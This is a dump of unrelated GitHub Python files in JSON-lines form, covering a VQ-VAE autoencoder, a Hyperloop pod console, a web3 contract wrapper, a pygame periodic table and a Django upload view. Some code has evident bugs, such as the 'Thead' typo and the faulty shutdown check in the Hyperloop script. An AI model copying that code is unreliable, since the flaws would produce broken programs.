logger: WandbLogger | CSVLogger, hidden_dim: int, input_dim: int, num_embeddings: int, embedding_dim: int, \n n_resblocks: int, learning_rate: float, seq_len: int=200, dropout_p: float=0.1):\n \"\"\"\n Initialize Autoencoder\n \n Args:\n logger (WandbLogger | CSVLogger): Logger \n input_dim (int): Input dimension\n num_embeddings (int): Number of embeddings\n embedding_dim (int): Embedding dimension\n n_resblocks (int): Number of residual blocks\n learning_rate (float): Learning rate\n dropout_p (float, optional): Dropout probability. Defaults to 0.1.\n \"\"\"\n super().__init__()\n self._logger = logger.experiment\n self.learning_rate = learning_rate\n self.dropout_p = dropout_p\n self.n_resblocks = n_resblocks\n self.num_embeddings: int = num_embeddings\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.input_dim = input_dim\n self.learning_rate = learning_rate\n self.seq_len = seq_len\n self.last_recon = (0,0)\n\n self.is_wandb_logger = isinstance(logger, WandbLogger)\n\n # optimizer params\n self.betas = (0.9, 0.95)\n self.weight_decay = 0.1 \n\n self.save_hyperparameters()\n\n @abstractmethod\n def forward(self, x: torch.Tensor):\n \"\"\"\n Forward pass of the model\n \n Args:\n x (torch.Tensor): Input data\n \n Returns:\n torch.Tensor: Reconstruction loss, data reconstruction, perplexity\n \"\"\"\n raise NotImplementedError\n\n\n def loss(self, preds: torch.Tensor, labels: torch.Tensor):\n \"\"\"\n Loss function (Rconstructon loss (MSE))\n \n Args:\n preds (torch.Tensor): Predictions\n labels (torch.Tensor): Labels\n \n Returns:\n torch.Tensor: Loss\n \"\"\"\n return F.mse_loss(preds, labels)\n \n @staticmethod\n def weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n try:\n nn.init.xavier_uniform_(m.weight.data)\n m.bias.data.fill_(0)\n except AttributeError:\n print(\"Skipping initialization of \", classname)\n\n def _forward_setp(self, x: torch.Tensor):\n embedding_loss, data_recon, perplexity = self(x)\n recon_error = F.mse_loss(data_recon, x)\n loss = recon_error + embedding_loss\n return loss, recon_error, data_recon\n\n def training_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the training loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('train/loss', loss, prog_bar=True)\n self.log('train/recon_error', recon_error)\n\n sample_idx = torch.randint(0, len(batch), (1,))\n self.last_recon = (batch[sample_idx], data_recon[sample_idx]) \n return {'loss': loss,\n 'recon_error': recon_error}\n\n def validation_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the validation loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('val/loss', loss, sync_dist=True, on_epoch=True, prog_bar=True)\n self.log('val/recon_error', recon_error, sync_dist=True, on_epoch=True)\n\n return {'loss': loss,\n 'recon_error': recon_error,\n 'data_recon': data_recon}\n\n def test_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the test loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('test/loss', loss, sync_dist=True, on_epoch=True, prog_bar=True)\n self.log('test/recon_error', recon_error, sync_dist=True, on_epoch=True)\n return {'loss': loss,\n 'recon_error': recon_error,\n 'data_recon': data_recon}\n\n def on_test_batch_end(self, outputs, batch, batch_idx) -> None:\n if batch_idx % 10 == 0:\n sample_idx = torch.randint(0, len(batch), (1,))\n data_recon = outputs['data_recon'][sample_idx].squeeze(0)\n x_batch = batch[sample_idx].squeeze(0)\n \n plot_recon(self._logger, x_batch, data_recon, title=f\"Test Reconstruction {batch_idx}\", plot_wandb=self.is_wandb_logger) \n\n def configure_optimizers(self):\n optimizer = torch.optim.RAdam(self.parameters(), lr=self.learning_rate)\n return optimizer\n\n","repo_name":"tmdt-buw/VQ-VAE-Transformer-Arc-Welding","sub_path":"model/autencoder_lightning_base.py","file_name":"autencoder_lightning_base.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37352918790","text":"#!/usr/bin/python3\n\nimport logging\nfrom os import path \nfrom logging import config \nfrom time import time\nfrom threading import Thread\nfrom pod_structure import Pod\nfrom StateMachine.statemachine import MainSM\nfrom Communication.tcpserver import TCPComm\nfrom Communiction.remote_client import TCPClient\nfrom Communication.data_processing import Data_Processing\nfrom HealthMonitor.healthmonitor import HealthMonitor\nfrom HardwareControl.brakes import Brakes\nfrom HardwareControl.motor import Motor\n\ndef main(root_logger):\n \"\"\"\n Prompt for hyperloop\n\n The prompt will soon come from the remote computer controlling the pod\n but for now it is here. \n\n \"\"\"\n PROMPT = \"[Hyperloop@\\x1b[33mVCU\\x1b[m] ~$ \"\n\n pod = Pod()\n tcp = TCPComm()\n remote = TCPClient(pod)\n sm = MainSM(pod, Brakes(pod), Motor())\n dp = Data_Processing(tcp)\n health = HealthMonitor(pod, tcp, sm)\n\n remote_thread = Thread(target=remote.run, name='RemoteThread')\n health_thread = Thread(target=health.run, name='HealthThread')\n dp_thread = Thead(target=health.run, name='DPThread')\n remote_thread.start()\n health_thread.start()\n dp_thread.start()\n\n hist = open('.pod_history', 'w')\n hist.write(\"=-=-=-=-=-=-=-=- New Flight -=-=-=-=-=-=-=-=\\n\")\n\n while True:\n user_input = input(PROMPT)\n hist.write(user_input + '\\n')\n\n if user_input == \"state\":\n print(sm.state)\n\t\t\t\n elif user_input == \"launch\":\n\n if input(\"Are you sure? [y/N]\") in (\"Y\", \"y\"):\n sm.on_event('launch')\n\n elif user_input == \"drift\":\n sm.on_event('drift')\n\n elif user_input == \"estop\":\n if input(\"Are you sure (Program must be restarted to recover from estop)? [y/N] \") in (\"Y\", \"y\"):\n \"\"\"ESTOP the pod\"\"\"\n sm.on_event('estop')\n else:\n continue\n\t\t\t\t\n elif user_input == \"shutdown\":\n if sm.state != \"Pre_Opeartional\" or sm.state != \"Estop\":\n print(\"[*] Program cannot exit safety currently!\")\n print(\"======> State: %s\", sm.state)\n continue\n\n tcp.close()\n\n health.stop_signal = True\n dp.stop_signal = True\n health_thread.join()\n dp_thread.join()\n remote.stop_signal = True\n remote_thread.join()\n\n hist.write('\\n')\n hist.close()\n return\n\n else:\n print(\"Commands: \")\n print(\"[1] help : This menu\")\n print(\"[2] state : Current State\")\n print(\"[3] launch : Launch pod with max speed\")\n print(\"[4] drift : Launch pod slowly\")\n print(\"[5] estop : Emergency stop the moving pod\")\n print(\"[6] shutdown : Shutdown program\")\n\n\nif __name__ == \"__main__\":\n\n log_file_path = path.join(path.dirname(path.abspath(__file__)), 'log.ini')\n logging.config.fileConfig(log_file_path)\n logger = logging.getLogger('root')\n\n print(\"====================================================================================================================================\")\n print(\"\\n\\n\\x1b[33m\")\n print(\"\\n\")\n print(\"██╗ ██╗██╗ ██╗██████╗ ███████╗██████╗ ██╗ ██████╗ ██████╗ ██████╗ █████╗ ████████╗ ██╗ ██╗ ██████╗██╗ ██╗\")\n print(\"██║ ██║╚██╗ ██╔╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██╔═══██╗██╔══██╗ ██╔══██╗╚══██╔══╝ ██║ ██║██╔════╝██║ ██║\")\n print(\"███████║ ╚████╔╝ ██████╔╝█████╗ ██████╔╝██║ ██║ ██║██║ ██║██████╔╝ ███████║ ██║ ██║ ██║██║ ██║ ██║\")\n print(\"██╔══██║ ╚██╔╝ ██╔═══╝ ██╔══╝ ██╔══██╗██║ ██║ ██║██║ ██║██╔═══╝ ██╔══██║ ██║ ╚██╗ ██╔╝██║ ██║ ██║\")\n print(\"██║ ██║ ██║ ██║ ███████╗██║ ██║███████╗╚██████╔╝╚██████╔╝██║ ██║ ██║ ██║ ╚████╔╝ ╚██████╗╚██████╔╝\")\n print(\"╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝\")\n print(\"\\n\")\n print(\"\\n\\x1b[m\")\n print(\"====================================================================================================================================\")\n\n time_naught = time()\n main(logger)\n time_final = time() - time_naught\n\n logger.info(\"[+] Finished\")\n logger.info(\"[+] Time Elapsed {0:.2f} seconds\\n\".format(time_final))\n\n print(\"\\n\")\n print(\"END OF FLIGHT\")\n\n","repo_name":"HyperloopatVCU/FlightComputer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16769923889","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndef main():\r\n\r\n s = (15,15)\r\n mat = np.zeros(s)\r\n mat = mat.astype(int)\r\n for i in range(15):\r\n for j in range(15):\r\n Downward = np.asarray(mat[0:i,j])\r\n toTheLeft = np.asarray(mat[i,0:j])\r\n Diagonal = np.diag(mat,k = (j-i))[0:min(i,j)]\r\n MinimumExclude = np.concatenate((Downward,toTheLeft,Diagonal))\r\n MinimumExclude = np.sort(MinimumExclude)\r\n \r\n runner = 0\r\n for value in MinimumExclude:\r\n if runner == value:\r\n runner = value + 1\r\n \r\n mat[i][j] = runner\r\n fig, ax = plt.subplots()\r\n\r\n ax.axis('tight')\r\n\r\n df = pd.DataFrame(mat, columns=np.arange(15))\r\n\r\n ax.table(cellText=df.values, colLabels=df.columns, loc='center')\r\n\r\n fig.tight_layout()\r\n\r\n plt.show()\r\n\r\n \r\n\r\n # print(mat)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"OrenZauda/G-values-of-Wythoff-game","sub_path":"2 dimension.py","file_name":"2 dimension.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16607046990","text":"\nimport os\nimport json\nfrom typing import Dict, Tuple\nfrom web3 import Web3\n\ndef Deployer(w3, private_key): \n private_key = private_key\n account = w3.eth.account.from_key(private_key)\n\n with open('/Users/abhinavmir/Desktop/Code/eclair/example/abis/abi.json', 'r') as file:\n abi = json.load(file)\n\n with open('/Users/abhinavmir/Desktop/Code/eclair/example/abis/bytecode', 'r') as file:\n bytecode = file.read()\n\n contract = w3.eth.contract(abi=abi, bytecode=bytecode)\n\n deploy_txn = contract.constructor([]).build_transaction({\n 'from': 'your_address',\n 'gas': 200000,\n 'gasPrice': 1000000000,\n 'nonce': 0\n })\n\n signed_txn = account.sign_transaction(deploy_txn)\n deployment_receipt = w3.eth.send_raw_transaction(signed_txn.rawTransaction)\n deployment_receipt = w3.eth.wait_for_transaction_receipt(deployment_receipt)\n contract_address = deployment_receipt['contractAddress']\n return {\n 'contract_address': contract_address,\n 'abi' : abi\n }\nclass contract_HelloWorld_class:\n\n def __init__(self, rpc, private_key):\n self.w3 = Web3(Web3.HTTPProvider(rpc))\n self.deployed = Deployer(self.w3, private_key)\n self.contract_address = self.deployed['contract_address']\n self.abi = self.deployed['abi']\n self.contract = self.w3.eth.contract(address=self.contract_address, abi=self.abi)\n self.private_key = private_key\n self.account = self.w3.eth.account.from_key(private_key)\n self.w3.eth.default_account = self.account.address\n \n def call_function(self, function_name: str, *args) -> Dict:\n function = getattr(self.contract.functions, function_name)(*args)\n return function.call(\n {\n 'from': self.w3.eth.default_account,\n 'gas': {},\n 'gasPrice': self.w3.eth.gas_price,\n 'nonce': self.w3.eth.get_transaction_count(self.w3.eth.default_account),\n }\n )\n \n def execute_transaction(self, function_name: str, *args) -> Dict:\n base_fee = self.w3.eth.gas_price * {}\n function = getattr(self.contract.functions, function_name)(*args)\n transaction = function.build_transaction({\n 'from': self.w3.eth.default_account,\n 'gas': {},\n 'gasPrice': self.w3.eth.gas_price,\n 'nonce': self.w3.eth.get_transaction_count(self.w3.eth.default_account),\n })\n signed_transaction = self.w3.eth.account.sign_transaction(\n transaction, private_key=self.private_key)\n tx_hash = self.w3.eth.send_raw_transaction(\n signed_transaction.rawTransaction)\n self.w3.eth.wait_for_transaction_receipt(tx_hash)\n receipt = self.w3.eth.get_transaction_receipt(tx_hash)\n if receipt['status'] == 0:\n raise Exception('Transaction failed')\n elif receipt['status'] == 1:\n return {\n 'txHash': tx_hash.hex(),\n 'returns': receipt,\n 'isSuccess': receipt['status'] == 1,\n }\n else:\n raise Exception('Unknown error')\n \n def execute_transaction_greet(self) -> (str):\n return self.execute_transaction('greet')\n \n def execute_transaction_sayHello(self) -> (str):\n return self.execute_transaction('sayHello')\n ","repo_name":"AbhinavMir/eclair","sub_path":"example/wrappers/HelloWorld.py","file_name":"HelloWorld.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"24076749465","text":"from math import floor, log, sqrt\nfrom itertools import count, islice\n\ndef is_prime(n):\n return n > 1 and all(n % i for i in islice(count(2), floor(sqrt(n)-1)))\n\ndef prime_generator(stop=10001):\n n = 2\n counter = 1\n while counter <= stop:\n if is_prime(n):\n yield n\n counter += 1\n n += 1\n\ndef find_number(div_max=20):\n result = 1\n\n for prime in prime_generator():\n a = floor(log(div_max) / log(prime))\n result = result * int(pow(prime, a))\n\n return result\n","repo_name":"pkostiukevych/project_euler","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4386592283","text":"#-*- coding: utf-8 -*-\n\ndef report(name,age,score):\n print(name,score)\n\nreport(age=10,name=\"yang\",score=90)\n\n\n\nS=\"아리랑\"\nprint(S)\nS=\"\"\"아리랑\n난리요\"\"\"\n\nprint(S)\n\na=1 #comment\nb=2\nc=4\nprint( int(3.6) )\n\nimport math\nimport math\nif c > 3:\n a=1\n b=3\n c=a+b\nelse:\n a=3\n b=4\n c=a+b\n\nprint(c)\n\nimport math\nn=math.sqrt(9.0)\nprint(n )\n\nx=True\ny=False\nif x and y:\n print(\"no\")\nelse:\n print(\"yes\")\n\nmember=[1,2,3]\nmem=3 in member\nprint(mem)\nprint(4 in member)\n\n","repo_name":"jyyang-sisul/learnAjax","sub_path":"pythonStudy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73840558233","text":"#!/usr/bin/env python\nimport sys; sys.path[:0] = [\"../..\"]\n\nimport math\nfrom pyx import *\n\ndef drawexample(canvas, corner, linealign):\n r = 1.5\n if corner:\n canvas.stroke(path.path(path.arc(5, 5, r, 0, 360)))\n else:\n canvas.stroke(path.path(path.arc(5.5, 5+math.sqrt(3)/6, r, 0, 360)))\n phi = 0\n while phi < 2 * math.pi + 1e-10:\n if corner:\n b = box.polygon(center=(5, 5), corners=((5, 5), (6, 5), (5.5, 5+math.sqrt(3)/2)))\n else:\n b = box.polygon(center=(5.5, 5+math.sqrt(3)/6), corners=((5, 5), (6, 5), (5.5, 5+math.sqrt(3)/2)))\n if linealign:\n b.linealign(r, math.cos(phi), math.sin(phi))\n else:\n b.circlealign(r, math.cos(phi), math.sin(phi))\n if round(phi / math.pi * 2 * 100) % 100:\n canvas.stroke(b.path(centerradius=0.05))\n else:\n canvas.stroke(b.path(centerradius=0.05), [color.rgb.red])\n phi += math.pi / 50\n\nc = canvas.canvas()\nsc = c.insert(canvas.canvas([trafo.translate(0, 6)]))\ndrawexample(sc, 0, 0)\nsc = c.insert(canvas.canvas([trafo.translate(6, 6)]))\ndrawexample(sc, 0, 1)\nsc = c.insert(canvas.canvas([trafo.translate(0, 0)]))\ndrawexample(sc, 1, 0)\nsc = c.insert(canvas.canvas([trafo.translate(6, 0)]))\ndrawexample(sc, 1, 1)\nc.writeEPSfile(\"test_box\", page_paperformat=document.paperformat.A4)\nc.writePDFfile(\"test_box\", page_paperformat=document.paperformat.A4)\nc.writeSVGfile(\"test_box\", page_paperformat=document.paperformat.A4)\n\n","repo_name":"pyx-project/pyx","sub_path":"test/functional/test_box.py","file_name":"test_box.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"5"} +{"seq_id":"70907213271","text":"from UserInterface import UserInterface\n\nclass InterfaceRequest:\n\t\"\"\"Object representing a message passed between Controller and UserInterface\n\t\n\t~~~~~~~~~~~~~~~~~~~~~\n\n\tTo use, ensure that you've run these imports:\n\tfrom InterfaceRequest import InterfaceRequest\n\tfrom UserInterface import UserInterface\n\t\n\tTo create, use the relevant factory method. Types of InterfaceRequests and their fields are\n\tgetLIST_DISPLAY(title, list_items, option_string, [aux])\n\t\ttitle: the title of the page overall\n\t\tlist_items: the list of items in the format (item title, item desc)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\toption_string: available options to display for this page\n\t\tsingle_input: the response from the UI will be placed here\n\tgetFORM_DISPLAY(title, fields, [aux]):\n\t\ttitle: the title of the form overall\n\t\tfields: 'questions' to pose to the user of form (question/field name, expected type)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\tinputs: list of inputs given, matching order of 'fields'\n\tgetITEM_DISPLAY(title, list_items, option_string, [aux]):\n\t\ttitle: the title of the page overall\n\t\tlist_items: the list of items in format (item title, item desc)\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\toption_string: available options to display for this page\n\t\tsingle_input: the response from the UI will be placed here\n\tgetCONFIRM_DISPLAY(title, msg, [aux]):\n\t\ttitle: the title of the confirmation dialog\n\t\tmsg: the message to display with the confirmation\n\t\taux: auxiliary field for whatever you like, displayed near bottom\n\t\tresponse: the response from the UI will be placed here\n\n\tDon't attempt to create your own InterfaceRequest(), as these methods will ensure they have the right\n\tfields!\n\t\n\t~~~~~~~~~~~~~~~~~~~~~\n\t\n\tOnce you have created your object, you may modify it if needed through the getField and setField\n\tmethods. These methods ensure that you only access and mutate fields that are actually present in\n\tthat object. For example, attempting to set the 'inputs' field of a LIST_DISPLAY will result in a TypeError,\n\tas LIST_DISPLAYS have only a 'single_input', not an 'inputs' list.\n\n\t~~~~~~~~~~~~~~~~~~~~~\n\n\tNow that your InterfaceRequest is set up, you can display it and get the response back with a statement like:\n\tmy_list_request = UserInterface.display(my_list_request)\n\n\tAssuming the object is properly set up, UserInterface will handle it and pass back the object with the user's\n\tresponse in the relevant field, which can be accessed like so:\n\tuser_response = my_list_request.getField('single_input')\n\t\n\t\"\"\"\n\tdef __init__(self, my_dict):\n\t\tself.d = my_dict\n\n\tdef getField(self, field):\n\t\tself._checkField(field)\n\t\treturn self.d[field]\n\n\tdef setField(self, field, value):\n\t\tself._checkField(field)\n\t\tself.d[field] = value\n\n\tdef _checkField(self, field):\n\t\tif field not in self.d:\n\t\t\traise TypeError(\"field '\" + str(field) + \"' not in request\")\n\n\t@staticmethod\n\tdef getLIST_DISPLAY(title, list_items, option_string, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'LIST_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['list_items'] = list_items\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['option_string'] = option_string\n\t\tmy_dict['single_input'] = ''\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getFORM_DISPLAY(title, fields, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'FORM_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['fields'] = fields\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['inputs'] = []\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getCONFIRM_DISPLAY(title, msg, aux=None):\n\t\tmy_dict = {}\n\t\tmy_dict['type'] = 'CONFIRM_DISPLAY'\n\t\tmy_dict['title'] = title\n\t\tmy_dict['msg'] = msg\n\t\tmy_dict['aux'] = aux\n\t\tmy_dict['response'] = ''\n\t\treturn InterfaceRequest(my_dict)\n\n\t@staticmethod\n\tdef getITEM_DISPLAY(title, list_items, option_string, aux=None):\n\t\toutput = InterfaceRequest.getLIST_DISPLAY(title, list_items, option_string, aux)\n\t\toutput.setField('type', 'ITEM_DISPLAY')\n\t\treturn output\n\nif __name__ == '__main__':\n\tir = InterfaceRequest.getLIST_DISPLAY('Search results',\n\t\t[('Bananas ea', '$1.00'), ('Bananas kg', '$10.00')],\n\t\t'X to exit, C to continue',\n\t\t'Total 2 items')\n\tir = UserInterface.display(ir)\n\tprint('You said,', ir.getField('single_input'))\n\tir2 = InterfaceRequest.getCONFIRM_DISPLAY('Confirm whateer', 'Please confirm that you wish to proceed with the transaction')\n\tir2 = UserInterface.display(ir2)\n\tprint('You said,', ir2.getField('response'))\n\tir3 = InterfaceRequest.getFORM_DISPLAY('Registration: Please enter your details', [('Name', 'string'), ('Age', 'int')])\n\tir3 = UserInterface.display(ir3)\n\tprint('Responses were', ir3.getField('inputs'))\n\tir4 = InterfaceRequest.getITEM_DISPLAY('Customer', [('Name', 'Jamie Hoffmann'), ('Age', 23), ('Course', 'MIT')], 'X to exit, E to edit')\n\tir4 = UserInterface.display(ir4)\n\tprint('You said,', ir4.getField('single_input'))\n","repo_name":"Frogulis/5136-shop","sub_path":"old-classes/InterfaceRequest.py","file_name":"InterfaceRequest.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"18522367338","text":"#Importation des bibliothèques :\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom data import *\r\n\r\n#Initialisation de pygame :\r\npygame.init()\r\npygame.display.set_caption(\"Grégory Projet Tableau Périodique\")\r\nsurface = pygame.display.set_mode((1050,625))\r\nhorloge = pygame.time.Clock()\r\n\r\n#Définition de la Police d'écriture pour plusieurs éléments:\r\nfont_element = pygame.font.SysFont('Arial', 20)\r\nfont_titre = pygame.font.SysFont('\"Volter.ttf\"', 40)\r\nfont_config = pygame.font.SysFont('Arial', 20)\r\nfont_legende = pygame.font.SysFont('Arial', 10)\r\nfont_masse = pygame.font.SysFont('Arial', 10)\r\nfont_nomcomplet = pygame.font.SysFont('Volter.ttf', 14)\r\n\r\n#Chargement de la musique de fond :\r\npygame.mixer.init()\r\npygame.mixer.music.load(\"Musique_De_Fond.mp3\")\r\npygame.mixer.music.play(loops=-1)\r\n\r\n#Couleur de fond :\r\nsurface.fill((185,248,248))\r\n\r\n# Création des légendes des groupes chimiques :\r\nliste_couleur = [(176,224,230),(187,210,225),(176,196,222),(173,216,230),(135,206,250),(135,206,235),(128,208,208),(95,158,160),(0,191,255),(119,181,254),(100,149,237)]\r\nliste_legende = [[10,570,80,20],[10,540,80,20],[10,510,80,20],[10,480,80,20],[10,450,80,20],[100,570,80,20],[100,540,80,20],[100,510,80,20],[100,480,80,20],[100,450,80,20],[190,440,80,20]]\r\nliste_groupe = [\"Diatomic nonmetal\",\"Noble gas\",\"Alkaline earth metal\",\"Polyatomic nonmetal\",\"Metalloid\",\"Alkali metal\",\"Transition metal\",\"Poor metal\",\"Transition metal\",\"Lanthanide\",\"Actinide\"]\r\nfor i in range(len(liste_couleur)):\r\n leg = pygame.draw.rect(surface,liste_couleur[i],liste_legende[i])\r\n texte = font_legende.render(liste_groupe[i],1,(255,0,0))\r\n surface.blit(texte,leg)\r\n\r\n#Ecriture du titre de mon tableau périodique\r\ntitre = 0\r\ntitre = font_titre.render(\"Tableau périodique TP Chimie Grégory\",1,(0,0,0))\r\nsurface.blit(titre, (300, 25))\r\n\r\n# Variable utile\r\ndata = 0\r\nw =1272\r\nc = 53\r\n\r\n#Les différents groupes de métaux :\r\ndef Groupes(x):\r\n for i in range(len(liste_groupe)):\r\n if data1[x][5] == liste_groupe[i]:\r\n return liste_couleur[i]\r\n return (230,230,250)\r\n\r\n# écriture des éléments chimiques :\r\ndef texte(x,rect):\r\n if data1[x][0] == \"La-Lu\" or data1[x][0] == \"Ac-Lr\":\r\n texte = font_element.render(\" \"+str(data1[x][0]),1,(255,0,0))\r\n surface.blit(texte,rect)\r\n else:\r\n texte = font_element.render(\" \"+str(data1[x][0]),1,(255,0,0))\r\n surface.blit(texte,rect)\r\n#écriture \r\ndef masse_atomique(x,y,i):\r\n titre = font_masse.render(data1[i][2],1,(0,0,0))\r\n surface.blit(titre,(x, y))\r\n#Nom Complet Cliquer\r\ndef nom_element(i):\r\n titre = font_nomcomplet.render(data1[i][1],1,(0,0,0))\r\n surface.blit(titre, (370, 85))\r\n\r\n#Ecriture config\r\ndef config(i):\r\n pygame.draw.rect(surface,(185,248,248),[353,70,200,90])\r\n config = font_config.render(str(data1[i][6]),1,(0,0,0))\r\n surface.blit(config,(370,100))\r\n config = font_masse.render(str(data1[i][2]),1,(0,0,0))\r\n surface.blit(config,(370,140))\r\n\r\n#Boucle savoir un élément chimique\r\ndef savoir_element(i): \r\n config(i)\r\n rectangle = pygame.draw.rect(surface,Groupes(i),[300,100,53,53],border_radius =3)\r\n texte(i,rectangle)\r\n nom_element(i)\r\n\r\ndef Savoir_Quelle_Element(rectangle1,mouse):\r\n if rectangle1 == True:\r\n if mouse[1] < 106 and mouse[0] < 83:\r\n i = 0\r\n savoir_element(i)\r\n elif mouse[1] < 106 and mouse[0] > 931:\r\n i = 1\r\n savoir_element(i)\r\n elif mouse[1] < 159 and mouse[0] < 136:\r\n i = ((mouse[0]-30)//53) + 2\r\n i+= 2\r\n savoir_element(i)\r\n elif mouse[1] < 159 and mouse[0] > 666:\r\n i = ((mouse[0]-30)//53 - 10)\r\n i += 2\r\n savoir_element(i)\r\n elif mouse[1] < 212 and mouse[0] < 136:\r\n i = ((mouse[0]-30)//53) + 10\r\n i += 10\r\n savoir_element(i)\r\n elif mouse[1] < 212 and mouse[0] > 666:\r\n i = ((mouse[0]-30)//53)\r\n savoir_element(i)\r\n elif mouse[1] > 212 and mouse[1] < 265:\r\n i = (mouse[0]-30)//53 + 18\r\n savoir_element(i)\r\n elif mouse[1] > 265 and mouse[1] < 318:\r\n i = ((mouse[0]-30)//53) + 36\r\n savoir_element(i)\r\n elif mouse[1] > 318 and mouse[1] < 371:\r\n i = ((mouse[0]-30)//53) + 54\r\n savoir_element(i)\r\n elif mouse[1] > 371 and mouse[1] < 424 and mouse[0] < 666:\r\n i = ((mouse[0]-30)//53) + 72\r\n savoir_element(i)\r\n else:\r\n if mouse[1] > 477 and mouse[1] < 530 and mouse[0] > 189:\r\n i = ((mouse[0]-30)//53 - 3) + 84\r\n savoir_element(i)\r\n if mouse[1] > 530 and mouse[1] < 583 and mouse[0] > 189:\r\n i = ((mouse[0]-30)//53 - 3) + 99\r\n savoir_element(i)\r\n\r\n#Création des cases :\r\ndef aide_creation_case(i,j):\r\n global data,a\r\n rectangle = pygame.draw.rect(surface,Groupes(data),[(i*c)+30,j*c, c, c],0,border_radius =3)\r\n x = i*c + 30\r\n y = j*c + 40\r\n masse_atomique(x,y,a)\r\n texte(data,rectangle)\r\n a += 1\r\n data += 1\r\na = 0\r\nfor j in range (0,13):\r\n for i in range(0,18):\r\n if data > 113:\r\n break\r\n if j == 1 and (i <1 or i >16 ) :\r\n aide_creation_case(i,j)\r\n elif j == 2 and (i<2 or i >11):\r\n aide_creation_case(i,j)\r\n elif j == 3 and (i<2 or i >11):\r\n aide_creation_case(i,j)\r\n elif (j>3 and j<7):\r\n aide_creation_case(i,j)\r\n elif j == 7 and i < 12:\r\n aide_creation_case(i,j)\r\n elif j == 9 and (i>2):\r\n aide_creation_case(i,j)\r\n elif j == 10 and (i>2):\r\n aide_creation_case(i,j)\r\n\r\n# Cliquer et afficher les infos en continue\r\nrun = True\r\nwhile run:\r\n mouse = pygame.mouse.get_pos()\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n elif pygame.mouse.get_pressed()[0]:\r\n detection = pygame.draw.rect(surface,(185,248,248),[30,53,954,371],1)\r\n if pygame.Rect.collidepoint(detection,mouse):\r\n rectangle1 = True\r\n Savoir_Quelle_Element(rectangle1,mouse)\r\n \r\n #Si le Deuxième bloc d'éléments est cliqué:\r\n detection = pygame.draw.rect(surface,(185,248,248),[189,477,795,106],1)\r\n if pygame.Rect.collidepoint(detection,mouse):\r\n rectangle1 = False\r\n Savoir_Quelle_Element(rectangle1,mouse)\r\n pygame.display.update()\r\n\r\npygame.quit()","repo_name":"GregoryDuporge/TableauPeriodique","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25826489366","text":"\nfrom django.shortcuts import render\nfrom django import forms\nfrom .models import ic,choice\nfrom django.db import IntegrityError\nimport os\nfrom web.settings import BASE_DIR\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\n#from reportlab.pdfgen import canvas\n\n# Create your views here.\n\ndef index(request):\n dic=[{'dbname':'Datasheets','url':'dsshow'},\n {'dbname':'Papers','url':'index'}]\n return render(request,'ds_index.html',{'list':dic})\n\nclass DSForm(forms.Form):\n mypn= forms.CharField()\n value= forms.CharField()\n type=forms.ChoiceField(choices=choice,required=False)\n description=forms.CharField()\n venderpn =forms.CharField(required=False)\n datasheet = forms.FileField(required=False)\n refdesign = forms.URLField(required=False)\n refcode = forms.FileField(required=False)\n refsch = forms.FileField(required=False)\n\n\n@login_required()\ndef dsupload(request):\n if request.method=='POST':\n form=DSForm(request.POST,request.FILES)\n if form.is_valid():\n cd=form.cleaned_data\n ic1=ic(mypn=cd['mypn'],value=cd['value'],\n type=cd['type'],description=cd['description'],venderpn=cd['venderpn'],\n 